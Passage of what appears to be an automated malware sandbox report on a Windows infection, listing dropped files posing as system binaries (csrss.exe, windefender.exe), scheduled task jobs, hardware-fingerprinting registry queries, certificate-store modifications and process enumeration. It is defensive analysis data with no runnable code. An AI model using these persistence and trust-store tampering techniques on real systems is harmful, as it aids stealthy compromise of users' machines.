File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job C:\Windows\SysWOW64\schtasks.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-42 = "E. South America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\un4.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Users\Admin\Pictures\PBCfG3wrCyp60tNkAdjwRCEQ.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe N/A
N/A N/A C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe N/A
